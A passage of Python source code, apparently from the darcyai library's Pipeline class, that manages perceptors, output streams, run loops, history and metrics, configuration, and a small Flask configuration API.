and returns the data that\n the output stream must process.\n output_stream (OutputStream): The OutputStream to be added.\n default_config (dict): The default configuration for the OutputStream.\n Defaults to `None`.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.add_output_stream(name=\"output_stream\",\n ... callback=None,\n ... output_stream=MyOutputStream(),\n ... default_config={\"key\": \"value\"})\n ```\n \"\"\"\n self.__logger.debug(\"Adding OutputStream '%s' to Pipeline\", name)\n\n validate_not_none(name, \"name is required\")\n validate_type(name, str, \"name must be a string\")\n validate(name.isidentifier(), \"name must be a valid identifier\")\n validate(\n name not in self.__output_streams,\n f\"output stream with name '{name}' already exists\")\n validate(name not in self.__perceptors, \"name must be unique\")\n\n validate_not_none(callback, \"callback is required\")\n validate(callable(callback), \"callback must be a function\")\n\n validate_not_none(output_stream, \"output_stream is required\")\n validate_type(\n output_stream,\n OutputStream,\n \"output_stream must be an instance of OutputStream\")\n\n self.__output_streams[name] = {\n \"callback\": callback,\n \"stream\": output_stream,\n }\n\n self.__create_config_registry_for_output_stream(\n name, output_stream, default_config)\n\n def remove_output_stream(self, name: str) -> None:\n \"\"\"\n Removes an OutputStream from the pipeline.\n\n # Arguments\n name (str): The name of the OutputStream to be removed.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\\\n >>> pipeline.add_output_stream(name=\"output_stream\",\n ... callback=None,\n ... output_stream=MyOutputStream(),\n ... default_config={\"key\": \"value\"})\n >>> pipeline.remove_output_stream(name=\"output_stream\")\n ```\n \"\"\"\n self.__logger.debug(\"Removing OutputStream '%s' from Pipeline\", name)\n\n validate_not_none(name, \"name is required\")\n validate_type(name, str, \"name must be a string\")\n\n if name not in self.__output_streams:\n raise ValueError(\n f\"output stream with name '{name}' does not exist\")\n\n del self.__output_streams[name]\n\n def stop(self) -> None:\n \"\"\"\n Stops the pipeline.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.stop()\n ```\n \"\"\"\n self.__logger.debug(\"Stopping Pipeline\")\n\n self.__running = False\n self.__input_stream.stop()\n for output_stream in self.__output_streams.values():\n output_stream[\"stream\"].close()\n\n def run(self) -> None:\n \"\"\"\n Runs the pipeline.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.run()\n ```\n \"\"\"\n self.__logger.debug(\"Running Pipeline\")\n\n self.__running = True\n\n pipeline_start_time = time.time()\n pps = 0\n\n stream = self.__input_stream.stream()\n validate_type(stream, Iterable, \"input stream is not Iterable\")\n\n perceptors_order = self.__get_perceptors_order()\n\n try:\n while True:\n start = time.perf_counter()\n try:\n input_data = next(stream, sentinel.END_OF_ITERATION)\n\n if input_data is sentinel.END_OF_ITERATION:\n return\n except Exception as e:\n self.__logger.exception(\"Error running Pipeline\")\n if self.__input_stream_error_handler_callback is not None:\n self.__input_stream_error_handler_callback(e)\n else:\n raise e\n\n self.__pulse_number += 1\n\n # Store input data history\n self.__input_data_history[self.__pulse_number] = input_data\n if len(self.__input_data_history) > self.__input_data_history_len:\n self.__input_data_history.popitem(last=False)\n\n pom = PerceptionObjectModel()\n\n # Run perceptors\n for perceptors in perceptors_order:\n async_calls = [\n self.__thread_pool.apply_async(\n self.__run_perceptor,\n args=(\n perceptor_name,\n input_data,\n pom),\n callback=self.__set_perceptor_result(perceptor_name, pom)) \\\n for perceptor_name in perceptors]\n _ = [async_call.get() for async_call in async_calls]\n\n pulse_execution_time = time.perf_counter() - start\n pps = int(self.__pulse_number / (time.time() - pipeline_start_time))\n\n # Calculate metrics\n if self.__pulse_number == 1:\n self.__average_pipeline_cycle_execution = pulse_execution_time\n else:\n self.__average_pipeline_cycle_execution = (\n self.__average_pipeline_cycle_execution *\n (self.__pulse_number - 1) +\n pulse_execution_time) / self.__pulse_number\n\n self.__metrics_history[self.__pulse_number] = {\n \"pulse_execution_time\": pulse_execution_time,\n \"perceptors\": self.__perceptors_execution_time,\n }\n if len(self.__metrics_history) > self.__metrics_history_len:\n self.__metrics_history.popitem(last=False)\n\n # Store pom\n pom.set_input_data(input_data)\n pom.set_pulse_number(self.__pulse_number)\n pom.set_pps(pps)\n self.__pom = pom\n\n # Store pom history\n self.__pom_history[self.__pulse_number] = self.__pom\n if len(self.__pom_history) > self.__pom_history_len:\n self.__pom_history.popitem(last=False)\n\n if self.__perception_completion_callback is not None:\n self.__perception_completion_callback(pom)\n\n # Run output streams\n if len(self.__output_streams) > 0:\n async_calls = [\n self.__thread_pool.apply_async(\n self.__run_output_stream,\n args=[\n output_stream_name,\n input_data,\n pom]) for output_stream_name in self.__output_streams]\n _ = [async_call.get() for async_call in async_calls]\n\n self.__pom = pom\n\n if self.__pulse_completion_callback is not None:\n self.__pulse_completion_callback(pom)\n finally:\n self.__running = False\n\n def get_pom(self) -> PerceptionObjectModel:\n \"\"\"\n Gets the Perception Object Model.\n\n # Returns\n PerceptionObjectModel: The Perception Object Model.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pom = pipeline.get_pom()\n ```\n \"\"\"\n return self.__pom\n\n def get_current_pulse_number(self) -> int:\n \"\"\"\n Gets the current pulse number.\n\n # Returns\n int: The current pulse number.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pulse_number = pipeline.get_current_pulse_number()\n ```\n \"\"\"\n return self.__pulse_number\n\n def get_latest_input(self) -> StreamData:\n \"\"\"\n Gets the latest input data.\n\n # Returns\n StreamData: The latest input data.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> latest_input = pipeline.get_latest_input()\n ```\n \"\"\"\n return self.__input_data_history[self.__pulse_number]\n\n def get_historical_input(self, pulse_number: int) -> StreamData:\n \"\"\"\n Gets the input data from the history.\n\n # Arguments\n pulse_number (int): The pulse number.\n\n # Returns\n StreamData: The input data from the history.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> historical_input = pipeline.get_historical_input(pulse_number=1)\n ```\n \"\"\"\n if pulse_number in self.__input_data_history:\n return self.__input_data_history[pulse_number]\n else:\n return None\n\n def get_input_history(self) -> Dict[int, StreamData]:\n \"\"\"\n Gets the input data history.\n\n # Returns\n `Dict[int, StreamData]` - The input data history.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> input_history = pipeline.get_input_history()\n ```\n \"\"\"\n return self.__input_data_history.copy()\n\n def get_historical_pom(self, pulse_number: int) -> PerceptionObjectModel:\n \"\"\"\n Gets the POM from the history.\n\n # Arguments\n pulse_number (int): The pulse number.\n\n # Returns\n PerceptionObjectModel: The POM from the history.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> historical_pom = pipeline.get_historical_pom(pulse_number=1)\n ```\n \"\"\"\n if pulse_number in self.__pom_history:\n return self.__pom_history[pulse_number]\n else:\n return None\n\n def get_pom_history(self) -> Dict[int, PerceptionObjectModel]:\n \"\"\"\n Gets the POM history.\n\n # Returns\n `Dict[int, PerceptionObjectModel]` - The POM history.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pom_history = pipeline.get_pom_history()\n ```\n \"\"\"\n return self.__pom_history.copy()\n\n def run_perceptor(\n self,\n perceptor: Perceptor,\n input_data: Any,\n multi: bool = False) -> Any:\n \"\"\"\n Runs the Perceptor.\n\n # Arguments\n perceptor (Perceptor): The Perceptor to be run.\n input_data (Any): The input data.\n multi (bool): Whether or not to run the perceptor for each item in input data.\n Defaults to `False`.\n\n # Returns\n Any: The result of running the Perceptor.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> result = pipeline.run_perceptor(perceptor=Perceptor(), input_data=None, multi=True)\n ```\n \"\"\"\n self.__logger.debug(\"Running custom Perceptor\")\n\n validate_not_none(perceptor, \"perceptor is required\")\n validate_type(\n perceptor,\n Perceptor,\n \"perceptor must be an instance of Perceptor\")\n\n if not perceptor.is_loaded():\n perceptor.load()\n\n if multi:\n return [perceptor.run(input_data_item, None)\n for input_data_item in input_data]\n else:\n return perceptor.run(input_data, None)\n\n def get_graph(self) -> Any:\n \"\"\"\n Gets the graph of the perceptors.\n\n # Returns\n Any: The graph of the perceptors.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> graph = pipeline.get_graph()\n ```\n \"\"\"\n result = {}\n for perceptor in self.__perceptors:\n result[perceptor] = self.__perceptors[perceptor].get_child_perceptors()\n\n return result\n\n def get_all_performance_metrics(self) -> Dict[str, Any]:\n \"\"\"\n Gets the performance metrics of the pipeline.\n\n # Returns\n `Dict[str, Any]` - The performance metrics of the pipeline.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> metrics = pipeline.get_all_performance_metrics()\n ```\n \"\"\"\n result = {\n \"execution_cycles\": self.__pulse_number,\n \"average_pipeline_cycle_execution\": self.__average_pipeline_cycle_execution,\n }\n\n perceptors = {}\n for perceptor_name in self.__perceptors:\n perceptors[perceptor_name] = self.__average_perceptor_execution[perceptor_name]\n result[\"average_perceptor_execution\"] = perceptors\n\n result[\"history\"] = self.__metrics_history\n return result\n\n def get_pulse_performance_metrics(\n self, pulse_number: Union[int, None] = None) -> Dict[str, Any]:\n \"\"\"\n Gets the performance metrics of the pipeline for specific pulse.\n\n # Arguments\n pulse_number (int): The pulse number of the pulse. Defaults to current pulse.\n Defaults to `None`.\n\n # Returns\n `Dict[str, Any]` - The performance metrics of the pipeline for specific pulse.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> metrics = pipeline.get_pulse_performance_metrics(pulse_number=1)\n ```\n \"\"\"\n if pulse_number is None:\n pulse_number = self.__pulse_number\n\n if pulse_number in self.__metrics_history:\n return self.__metrics_history[pulse_number]\n else:\n return None\n\n def get_perceptor_performance_metrics(\n self, name: str, pulse_number: Union[int, None] = None) -> Dict[str, Any]:\n \"\"\"\n Gets the performance metrics of the pipeline for specific perceptor.\n\n # Arguments\n name (str): The name of the perceptor.\n pulse_number (int): The pulse number of the pulse. Defaults to current pulse.\n Defaults to `None`.\n\n # Returns\n `Dict[str, Any]` - The performance metrics of the pipeline for specific perceptor.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> metrics = pipeline.get_perceptor_performance_metrics(name=\"perceptor_name\",\n ... pulse_number=1)\n ```\n \"\"\"\n if name not in self.__perceptors:\n return None\n\n if pulse_number is None:\n pulse_number = self.__pulse_number\n\n if pulse_number in self.__metrics_history:\n return self.__metrics_history[pulse_number][\"perceptors\"][name]\n else:\n return None\n\n def set_perceptor_config(\n self,\n perceptor_name: str,\n name: str,\n value: Any) -> None:\n \"\"\"\n Sets the config of the pipeline.\n\n # Arguments\n perceptor_name (str): The name of the perceptor.\n name (str): The name of the config.\n value (Any): The value of the config.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.set_perceptor_config(perceptor_name=\"perceptor_name\",\n ... name=\"config_name\",\n ... value=1)\n ```\n \"\"\"\n if perceptor_name in self.__perceptor_config_registry:\n self.__validate_and_set_value_for_perceptor_config(\n perceptor_name, name, value)\n self.__perceptors[perceptor_name].set_perceptor_config(name, value)\n else:\n raise Exception(\n f\"Perceptor with name '{perceptor_name}' not found\")\n\n def get_perceptor_config(\n self, perceptor_name: str) -> Dict[str, Tuple[Any, Config]]:\n \"\"\"\n Gets the config of the perceptor.\n\n # Arguments\n perceptor_name (str): The name of the perceptor.\n\n # Returns\n `Dict[str, Tuple[Any, Config]]` - The config of the perceptor.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> config = pipeline.get_perceptor_config(perceptor_name=\"perceptor_name\")\n ```\n \"\"\"\n if perceptor_name not in self.__perceptor_config_registry:\n raise Exception(\n f\"Perceptor with name '{perceptor_name}' not found\")\n\n response = {}\n for config_name in self.__perceptor_config_schema[perceptor_name]:\n config_schema = self.__perceptor_config_schema[perceptor_name][config_name]\n response[config_name] = (\n self.__perceptor_config_registry[perceptor_name].get(config_name),\n config_schema)\n\n return response\n\n def set_output_stream_config(\n self,\n name: str,\n config_name: str,\n value: Any) -> None:\n \"\"\"\n Sets the config of the output stream.\n\n # Arguments\n name (str): The name of the output stream.\n config_name (str): The name of the config.\n value (Any): The value of the config.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.set_output_stream_config(name=\"output_stream_name\",\n ... config_name=\"config_name\",\n ... value=1)\n ```\n \"\"\"\n if name in self.__output_config_registry:\n self.__validate_and_set_value_for_output_stream_config(\n name, config_name, value)\n self.__output_streams[name].set_perceptor_config(\n config_name, value)\n else:\n raise Exception(f\"OutputStream with name '{name}' not found\")\n\n def get_output_stream_config(\n self, name: str) -> Dict[str, Tuple[Any, Config]]:\n \"\"\"\n Gets the config of the output stream.\n\n # Arguments\n name (str): The name of the output stream.\n\n # Returns\n `Dict[str, Tuple[Any, Config]]` - The config of the output stream.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> config = pipeline.get_output_stream_config(name=\"output_stream_name\")\n ```\n \"\"\"\n if name not in self.__output_config_registry:\n raise Exception(f\"OutputStream with name '{name}' not found\")\n\n response = {}\n for config_name in self.__output_config_schema[name]:\n config_schema = self.__output_config_schema[name][config_name]\n response[config_name] = (\n self.__output_config_registry[name].get(config_name),\n config_schema)\n\n return response\n\n def __run_output_stream(\n self, name: str, input_data: StreamData, pom: PerceptionObjectModel) -> None:\n \"\"\"\n Runs the output stream.\n\n # Arguments\n name (str): The name of the output stream.\n input_data (StreamData): The input data.\n pom (PerceptionObjectModel): The pom.\n \"\"\"\n try:\n processed_data = self.__output_streams[name][\"callback\"](\n pom, input_data)\n output = self.__output_streams[name][\"stream\"].write(processed_data)\n pom.set_value(name, output)\n except Exception as e:\n self.__logger.exception(\"Error running output stream '%s'\", name)\n if self.__output_stream_error_handler_callback is not None:\n self.__output_stream_error_handler_callback(name, e)\n else:\n raise e\n\n def __run_perceptor(\n self, name: str, input_data: StreamData, pom: PerceptionObjectModel) -> None:\n \"\"\"\n Runs the perceptor.\n\n # Arguments\n name (str): The name of the perceptor.\n input_data (StreamData): The input data.\n pom (PerceptionObjectModel): The pom.\n \"\"\"\n start = time.perf_counter()\n try:\n return self.__processing_engine.run(\n self.__perceptors[name],\n input_data,\n pom,\n self.__perceptor_config_registry[name])\n except Exception as e:\n self.__logger.exception(\"Error running perceptor '%s'\", name)\n if self.__perceptor_error_handler_callback is not None:\n self.__perceptor_error_handler_callback(name, e)\n else:\n raise e\n finally:\n execution_time = time.perf_counter() - start\n self.__perceptors_execution_time[name] = {\n \"execution_time\": execution_time,\n }\n if name in self.__average_perceptor_execution:\n avg_perceptors_execution = self.__average_perceptor_execution[name]\n self.__average_perceptor_execution[name] = (\n avg_perceptors_execution *\n (self.__pulse_number - 1) +\n execution_time) / self.__pulse_number\n else:\n self.__average_perceptor_execution[name] = execution_time\n\n def __set_perceptor_result(\n self, perceptor_name: str, pom: PerceptionObjectModel) -> Callable[[Any], None]:\n \"\"\"\n Sets the result of the perceptor.\n\n # Arguments\n perceptor_name (str): The name of the perceptor.\n pom (PerceptionObjectModel): The pom.\n\n # Returns\n Callable[[Any], None]: The callback function.\n \"\"\"\n def set_result(result: Any) -> None:\n \"\"\"\n Sets the result of the perceptor.\n\n # Arguments\n result (Any): The result of the perceptor.\n \"\"\"\n pom.set_value(perceptor_name, result)\n\n return set_result\n\n def __get_perceptors_order(self) -> List[str]:\n \"\"\"\n Gets the topological order of the perceptors.\n\n # Returns\n [str]: The order of the perceptors.\n \"\"\"\n orphan_perceptors = []\n parent_perceptors = []\n visited = []\n\n for perceptor_name in self.__perceptors:\n child_perceptors = self.__perceptors[perceptor_name].get_child_perceptors(\n )\n if len(child_perceptors) == 0:\n if perceptor_name not in visited:\n orphan_perceptors.append(perceptor_name)\n else:\n visited.append(perceptor_name)\n for child in child_perceptors:\n parent_perceptors.append((perceptor_name, child))\n visited.append(child)\n\n if len(parent_perceptors) > 0:\n perceptors_order = acyclic_toposort(parent_perceptors)\n _ = [perceptors_order[0].add(x) for x in orphan_perceptors]\n else:\n perceptors_order = [orphan_perceptors]\n\n return perceptors_order\n\n def __validate_perceptor(self,\n name: str,\n perceptor: Perceptor,\n input_callback:\n Callable[[StreamData, PerceptionObjectModel], Any] = None,\n output_callback: Callable[[Any, PerceptionObjectModel], Any] = None,\n accelerator_idx: Union[int, None] = None,\n default_config: dict = None) -> None:\n \"\"\"\n Validates the perceptor.\n\n # Arguments\n name (str): The name of the perceptor.\n perceptor (Perceptor): The perceptor.\n input_callback (Callable[[StreamData, PerceptionObjectModel], Any]): The\n callback function for the input stream. Default is `None`.\n output_callback (Callable[[Any, PerceptionObjectModel], Any]): The\n callback function for the output stream. Default is `None`.\n accelerator_idx (int): The index of the accelerator. Defaults to `0`.\n default_config (dict): The default config. Defaults to `None`.\n \"\"\"\n if self.__running:\n raise Exception(\"Pipeline is already running\")\n\n validate_not_none(name, \"name is required\")\n validate_type(name, str, \"name must be a string\")\n validate(name.isidentifier(), \"name must be a valid identifier\")\n validate(name not in self.__perceptors, \"name must be unique\")\n validate(name not in self.__output_streams, \"name must be unique\")\n\n validate_not_none(perceptor, \"perceptor is required\")\n validate_type(\n perceptor,\n Perceptor,\n \"perceptor must be an instance of Perceptor\")\n\n if input_callback is not None:\n validate_not_none(input_callback, \"input_callback is required\")\n validate(callable(input_callback), \"input_callback must be a function\")\n\n if output_callback is not None:\n validate(\n callable(output_callback),\n \"output_callback must be a function\")\n\n validate_not_none(accelerator_idx, \"accelerator_idx is required\")\n validate_type(\n accelerator_idx,\n int,\n \"accelerator_idx must be an integer\")\n\n if accelerator_idx >= self.__num_of_edge_tpus:\n raise ValueError(\n f\"accelerator_idx must be >= 0 and < {self.__num_of_edge_tpus}\")\n\n if default_config is not None:\n validate_type(\n default_config,\n dict,\n \"default_config must be a dictionary\")\n\n def __get_perceptor_parents(self, perceptor_name: str) -> List[str]:\n \"\"\"\n Gets the parents of the perceptor.\n\n # Arguments\n perceptor_name (str): The name of the perceptor.\n\n # Returns\n [str]: The parents of the perceptor.\n \"\"\"\n parent_perceptors = []\n for parent_perceptor_name in self.__perceptors:\n child_perceptors = self.__perceptors[parent_perceptor_name].get_child_perceptors(\n )\n if perceptor_name in child_perceptors:\n parent_perceptors.append(parent_perceptor_name)\n\n return parent_perceptors\n\n def __create_config_registry_for_perceptor(\n self,\n perceptor_name: str,\n perceptor: Perceptor,\n default_config: dict = None) -> None:\n \"\"\"\n Creates the config registry for the perceptor.\n\n # Arguments\n perceptor_name (str): The name of the perceptor.\n perceptor (Perceptor): The perceptor.\n default_config (dict): The default config. Defaults to `None`.\n \"\"\"\n self.__perceptor_config_registry[perceptor_name] = ConfigRegistry()\n\n perceptor_config_schema = perceptor.get_config_schema()\n config_schema_dict = {}\n for config_schema in perceptor_config_schema:\n validate_type(\n config_schema,\n Config,\n \"config_schema must be an instance of Config\")\n config_schema_dict[config_schema.name] = config_schema\n self.__perceptor_config_registry[perceptor_name].set_value(\n config_schema.name, config_schema.default_value)\n self.__perceptor_config_schema[perceptor_name] = config_schema_dict\n\n if default_config is not None:\n for name, value in default_config.items():\n self.__validate_and_set_value_for_perceptor_config(\n perceptor_name, name, value)\n\n def __validate_and_set_value_for_perceptor_config(\n self, perceptor_name: str, config_name: str, value: Any) -> None:\n \"\"\"\n Validates and sets the value for the perceptor config.\n\n # Arguments\n perceptor_name (str): The name of the perceptor.\n config_name (str): The name of the config.\n value (Any): The value of the config.\n \"\"\"\n config_schema_dict = self.__perceptor_config_schema[perceptor_name]\n if config_name not in config_schema_dict:\n return\n\n config_schema = config_schema_dict[config_name]\n\n converted_value = value\n if config_schema.type == \"rgb\" and isinstance(value, str):\n if value[0] == \"#\":\n converted_value = RGB.from_hex_string(value)\n else:\n converted_value = RGB.from_string(value)\n\n if not config_schema.is_valid(converted_value):\n raise ValueError(f\"Invalid value for config '{config_name}'\")\n\n self.__perceptor_config_registry[perceptor_name].set_value(\n config_name, converted_value)\n self.__perceptors[perceptor_name].set_perceptor_config(\n config_name, converted_value)\n\n def __start_api_server(self) -> None:\n \"\"\"\n Starts the API server.\n \"\"\"\n script_dir = pathlib.Path(__file__).parent.absolute()\n swagger_path = os.path.join(script_dir, \"swagger\")\n if self.__flask_app is None:\n self.__flask_app = Flask(__name__,\n static_folder=os.path.join(swagger_path, \"static\"),\n template_folder=os.path.join(swagger_path, \"templates\"))\n self.__setup_paths()\n self.__flask_app.json_encoder = CustomJSONEncoder\n serve(self.__flask_app, listen=f\"{self.__host}:{self.__port}\")\n else:\n self.__setup_paths()\n self.__flask_app.json_encoder = CustomJSONEncoder\n\n def __setup_paths(self) -> None:\n \"\"\"\n Sets up the paths.\n \"\"\"\n paths = {\n \"/perceptors\": {\n \"methods\": [\"GET\"],\n \"function\": self.__get_perceptors,\n },\n \"/outputs\": {\n \"methods\": [\"GET\"],\n \"function\": self.__get_outputs,\n },\n \"/perceptors/config\": {\n \"methods\": [\"GET\", \"PATCH\"],\n \"function\": self.__modify_perceptors_config_registry,\n },\n \"/perceptors//config\": {\n \"methods\": [\"GET\", \"PATCH\"],\n \"function\": self.__modify_perceptor_config_registry,\n },\n \"/outputs/config\": {\n \"methods\": [\"GET\", \"PATCH\"],\n \"function\": self.__modify_outputs_config_registry,\n },\n \"/outputs//config\": {\n \"methods\": [\"GET\", \"PATCH\"],\n \"function\": self.__modify_output_config_registry,\n },\n \"/swagger\": {\n \"methods\": [\"GET\"],\n \"function\": self.__swagger,\n },\n \"/specs\": {\n \"methods\": [\"GET\"],\n \"function\": self.__specs,\n },\n }\n\n for path, path_config in paths.items():\n complete_path = self.__path + path\n\n add = True\n for rule in self.__flask_app.url_map.iter_rules():\n if rule.rule == complete_path:\n add = False\n break\n\n if not add:\n continue\n\n self.__flask_app.add_url_rule(\n complete_path,\n complete_path,\n path_config[\"function\"],\n methods=path_config[\"methods\"])\n\n def __get_perceptors(self) -> Response:\n \"\"\"\n Gets the perceptors.\n\n # Returns\n Response: The response.\n \"\"\"\n perceptors = self.__perceptors.keys()\n return jsonify(list(perceptors))\n\n def __get_outputs(self) -> Response:\n \"\"\"\n Gets the outputs.\n\n # Returns\n Response: The response.\n \"\"\"\n output_streams = self.__output_streams.keys()\n return jsonify(list(output_streams))\n\n def __modify_perceptors_config_registry(self) -> Response:\n \"\"\"\n Modifies the perceptors config registry.\n\n # Returns\n Response: The response.\n \"\"\"\n errors = []\n if request.method == \"PATCH\":\n body = self.__get_body()\n for perceptor_name, values in body.items():\n if perceptor_name not in self.__perceptors:\n return Response(\n f\"perceptor with name {perceptor_name} does not exist\",\n status=404)\n\n for name, value in values.items():\n try:\n self.__validate_and_set_value_for_perceptor_config(\n perceptor_name, name, value)\n except BaseException:\n errors.append(f\"Invalid value for config '{name}'\")\n pass\n\n if len(errors) > 0:\n return jsonify(errors), 400\n\n cfgs = {}\n for perceptor_name in self.__perceptors:\n cfgs[perceptor_name] = []\n for config_name in self.__perceptor_config_schema[perceptor_name]:\n config_schema = self.__perceptor_config_schema[perceptor_name][config_name]\n cfgs[perceptor_name].append({\n \"name\": config_name,\n \"label\": config_schema.label,\n \"value\": self.__perceptor_config_registry[perceptor_name].get(config_name),\n \"type\": config_schema.type,\n \"description\": config_schema.description,\n \"default_value\": config_schema.default_value,\n })\n\n return jsonify(cfgs)\n\n def __modify_perceptor_config_registry(self, **kwargs) -> Response:\n \"\"\"\n Modifies the perceptor config registry.\n\n # Arguments\n **kwargs: The keyword arguments.\n\n # Returns\n Response: The response.\n \"\"\"\n perceptor_name = kwargs[\"perceptor\"]\n\n if perceptor_name not in self.__perceptors:\n return Response(\n f\"perceptor with name {perceptor_name} does not exist\", status=404)\n\n errors = []\n if request.method == \"PATCH\":\n body = self.__get_body()\n for name, value in body.items():\n try:\n self.__validate_and_set_value_for_perceptor_config(\n perceptor_name, name, value)\n except BaseException:\n errors.append(f\"Invalid value for config '{name}'\")\n pass\n\n if len(errors) > 0:\n return jsonify(errors), 400\n\n cfgs = []\n for config_name in self.__perceptor_config_schema[perceptor_name]:\n config_schema = self.__perceptor_config_schema[perceptor_name][config_name]\n cfgs.append({\n \"name\": config_name,\n \"label\": config_schema.label,\n \"value\": self.__perceptor_config_registry[perceptor_name].get(config_name),\n \"type\": config_schema.type,\n \"description\": config_schema.description,\n \"default_value\": config_schema.default_value,\n })\n\n return jsonify(cfgs)\n\n def __modify_outputs_config_registry(self) -> Response:\n \"\"\"\n Modifies the outputs config registry.\n\n # Returns\n Response: The response.\n \"\"\"\n errors = []\n if request.method == \"PATCH\":\n body = self.__get_body()\n for output_name, values in body.items():\n if output_name not in self.__output_streams:\n return Response(\n f\"output stream with name {output_name} does not exist\", status=404)\n\n for name, value in values.items():\n try:\n self.__validate_and_set_value_for_output_stream_config(\n output_name, name, value)\n except BaseException:\n errors.append(f\"Invalid value for config '{name}'\")\n pass\n\n if len(errors) > 0:\n return jsonify(errors), 400\n\n cfgs = {}\n for output_name in self.__output_streams:\n cfgs[output_name] = []\n for config_name in self.__output_config_schema[output_name]:\n config_schema = self.__output_config_schema[output_name][config_name]\n cfgs[output_name].append({\n \"name\": config_name,\n \"label\": config_schema.label,\n \"value\": self.__output_config_registry[output_name].get(config_name),\n \"type\": config_schema.type,\n \"description\": config_schema.description,\n \"default_value\": config_schema.default_value,\n })\n\n return jsonify(cfgs)\n\n def __modify_output_config_registry(self, **kwargs) -> Response:\n \"\"\"\n Modifies the output config registry.\n\n # Arguments\n **kwargs: The keyword arguments.\n\n # Returns\n Response: The response.\n \"\"\"\n output_name = kwargs[\"output_stream\"]\n\n if output_name not in self.__output_streams:\n return Response(\n f\"output stream with name {output_name} does not exist\", status=404)\n\n errors = []\n if request.method == \"PATCH\":\n body = self.__get_body()\n for name, value in body.items():\n try:\n self.__validate_and_set_value_for_output_stream_config(\n output_name, name, value)\n except BaseException:\n errors.append(f\"Invalid value for config '{name}'\")\n pass\n\n if len(errors) > 0:\n return jsonify(errors), 400\n\n cfgs = []\n for config_name in self.__output_config_schema[output_name]:\n config_schema = self.__output_config_schema[output_name][config_name]\n cfgs.append({\n \"name\": config_name,\n \"label\": config_schema.label,\n \"value\": self.__output_config_registry[output_name].get(config_name),\n \"type\": config_schema.type,\n \"description\": config_schema.description,\n \"default_value\": config_schema.default_value,\n })\n\n return jsonify(cfgs)\n\n def __create_config_registry_for_output_stream(\n self,\n name: str,\n output_stream: OutputStream,\n default_config: dict = None) -> None:\n \"\"\"\n Creates the config registry for an output stream.\n\n # Arguments\n name: The name of the output stream.\n output_stream: The output stream.\n default_config: The default config. 